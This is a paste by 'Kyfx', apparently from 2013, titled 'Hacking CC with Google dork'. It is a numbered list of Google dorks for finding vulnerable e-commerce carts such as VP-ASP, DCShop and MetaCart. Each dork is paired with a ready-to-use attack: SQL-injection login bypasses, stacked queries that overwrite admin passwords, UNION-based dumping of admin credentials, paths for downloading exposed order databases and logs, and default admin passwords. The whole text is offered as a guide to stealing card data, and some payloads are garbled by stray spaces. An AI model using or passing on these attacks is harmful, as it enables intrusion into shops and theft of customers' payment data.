Google Dorks

1. Kyfx
2.  
3. Hacking CC with Google dork 2013 but might work in 2014 of vunerablilty
4.  
5. 1:
6. google dork :--> inurl:"/cart.php?m="
7. target looks lile :--> ...cart.php?m=view
8. exploit: chage cart.php?m=view to /admin
9. target whit exploit :-->
10. Usename : 'or"="
11. Password : 'or"=
12.  
13. 2:
14. google dork :--> allinurlroddetail.asp?prod=
15. target looks like :--> xxxxx.org (big leters and numbers )
16. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
17. target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
18.  
19. 3:
20. google dork :--> allinurl: /cgi-local/shopper.cgi
21. target looks like :--> ....dd=action&key=
22. exploit :--> ...&template=order.log
23. target whit exploit :--> .....late=order.log
24.  
25. 4:
26. google dork :--> allinurl: Lobby.asp
27. target looks like :--> www.xxxxx.com/mall/lobby.asp
28. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
29. target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
30.  
31. 5:
32. google dork :--> allinurl:/vpasp/shopsearch.asp
33. when u find a target put this in search box
34. Keyword=&category=5); insert into tbluser (fldusername) values
35. ('')--&SubCategory=&hide=&action.x=46&action.y=6
36. Keyword=&category=5); update tbluser set fldpassword='' where
37. fldusername=''--&SubCategory=All&action.x=33&action.y=6
38. Keyword=&category=3); update tbluser set fldaccess='1' where
39. fldusername=''--&SubCategory=All&action.x=33&action.y=6
40. Jangan lupa untuk mengganti dan nya terserah kamu.
41. Untuk mengganti password admin, masukkan keyword berikut :
42. Keyword=&category=5); update tbluser set fldpassword='' where
43. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
44.  
45. login page:
46.  
47. 6:
48. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
49. target looks like :--> ....asp?cat=xxxxxx
50. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
51. if this is not working try this ends
52. %20'a%25'--
53. %20'b%25'--
54. %20'c%25'--
55. after finding user and pass go to login page:
56.  
57. 7:
58. google dork :--> allinurl:/shopadmin.asp
59. target looks like :--> www.xxxxxx.com/shopadmin.asp
60. exploit:
61. user : 'or'1
62. pass : 'or'1
63.  
64. 8:
65. google.com :--> allinurl:/store/index.cgi/page=
66. target looks like :--> ....shortblue.htm
67. exploit :--> ../admin/files/order.log
68. target whit exploit :--> .c....iles/order.log
69.  
70. 9:
71. google.com:--> allinurl:/metacart/
72. target looks like :--> www.xxxxxx.com/metacart/about.asp
73. exploit :--> /database/metacart.mdb
74. target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
75.  
76. 10:
77. google.com:--> allinurl:/DCShop/
78. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
79. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
80. target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
81.  
82. 11:
83. google.com:--> allinurl:/shop/category.asp/catid=
84. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
85. exploit :--> /admin/dbsetup.asp
86. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
87. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
88. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
89. in db look for access to find pass and user of shop admins.
90.  
91. 12:
92. google.com:--> allinurl:/commercesql/
93. target looks like :--> www.xxxxx.com/commercesql/xxxxx
94. exploit :--> cgi-bin/commercesql/index.cgi?page=
95. target whit exploit admin config :--> ..../adminconf.pl
96. target whit exploit admin manager :--> ....in/manager.cgi
97. target whit exploit order.log :--> ....iles/order.log
98.  
99. 13:
100. google.com:--> allinurl:/eshop/
101. target looks like :--> www.xxxxx.com/xxxxx/eshop
102. exploit :-->/cg-bin/eshop/database/order.mdb
103. target whit exploit :--> ....base/order.mdb
104. after dl the db look at access for user and password
105.  
106. 14:
107. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
108. --->=5
109.  
110. 2/ find error by adding '
111. --->=5'
112.  
113. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
114.  
115. -If you don't see error then change id to cat
116.  
117. --->=5'
118.  
119. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
120.  
121. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
122.  
123. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
124.  
125. 4/ add 2,3,4,5,6.......until you see a nice table
126.  
127. add 2
128. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
129. then 3
130. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
131. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
132.  
133. ...5,6,7,8,9.... untill you see a table. (exp:...47)
134.  
135. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
136. ---->see a table.
137.  
138. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
139.  
140. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
141.  
142. 6/ Find link admin to login:
143. try this first:
144. or:
145.  
146. Didn't work? then u have to find yourself:
147.  
148. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
149.  
150. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
151.  
152. you'll see something like: ( lot of them)
153.  
154. shopaddmoretocart.asp
155. shopcheckout.asp
156. shopdisplaycategories.asp
157. ..............
158.  
159. then guess admin link by adding the above data untill you find admin links
160.  
161. 15:
162. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
163. the most important thing here is xDatabase
164. xDatabase: shopping140
165. ok now the URL will be like this:
166. ****://.victim.com/shop/shopping140.mdb
167. if you didn't download the Database..
168. Try this while there is dblocation.
169. xDblocation
170. resx
171.  
172. the url will be:
173. ****://.victim.com/shop/resx/shopping140.mdb
174. If u see the error message you have to try this :
175. ****://.victim.com/shop/shopping500.mdb
176.  
177. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
178.  
179. inside you should be able to find *** information.
180. and you should even be able to find the admin username and password for the website.
181.  
182. the admin login page is usually located here
183. ****://.victim.com/shop/shopadmin.asp
184.  
185. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
186.  
187. Username: admin
188. password: admin
189. OR
190. Username: vpasp
191. password: vpasp
192.  
193. Hope you enjoy this !!
194.  
195.  
196.  
197.  
198. 2013...
199.  
200. Kyfx